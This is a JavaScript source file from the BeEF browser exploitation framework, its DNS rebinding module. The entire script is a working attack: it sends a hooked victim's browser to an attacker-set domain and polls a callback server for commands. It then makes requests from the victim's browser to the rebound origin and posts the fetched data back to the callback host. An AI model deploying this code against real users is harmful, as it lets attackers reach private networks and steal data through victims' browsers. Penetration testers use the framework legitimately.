Path: blob/master/modules/network/dns_rebinding/command.js
1872 views
//1// Copyright (c) 2006-2026 Wade Alcorn - [email protected]2// Browser Exploitation Framework (BeEF) - https://beefproject.com3// See the file 'doc/COPYING' for copying permission4//5beef.execute(function() {6var domain = "<%= @domain %>"7if (window.location.href.indexOf(domain) == -1) {8window.location.href = "http://"+domain+"/";9} else {10//Cut '/' from url11var url = window.location.href.slice(0, -1);12var url_callback = "<%= @url_callback %>";13url_callback += '/?from=from_victim&&';1415function get_next_query() {16var xhr_callback = new XMLHttpRequest();17//Synchronous because we do nothing without query from BeEF owner18xhr_callback.open('GET', url_callback+'que=req', true);19xhr_callback.onload = resolv_query;20xhr_callback.send(null);21}2223function resolv_query() {24var path = this.getResponseHeader('path');25var method = this.getResponseHeader('method');26var data = this.responseText;2728//Asynchronous beacuse XHR2 don't work with responseType when synchronous29var xhr = new XMLHttpRequest();30xhr.open(method, url+path, true);31xhr.responseType = 'arraybuffer'32xhr.onload = function(e) {33var blob = new Blob([this.response], {type: this.getResponseHeader('Content-Type')});34beef.debug(blob);35xhr_cb = new XMLHttpRequest();36xhr_cb.open('POST', url_callback+'que=req&&path='+path, false);37xhr_cb.send(blob);3839elem = document.createElement("div");40elem.id = 'log';41elem.innerHTML = 'Downloaded: '+path;42document.body.insertBefore(elem, document.body.childNodes[0]);43}44xhr.send(data);45}4647xhr1 = new XMLHttpRequest();48xhr1.open('GET', url+'/?load', false);49xhr1.send(null);50if (xhr1.status == 200) {51setInterval(get_next_query, 1000);52}5354}55});565758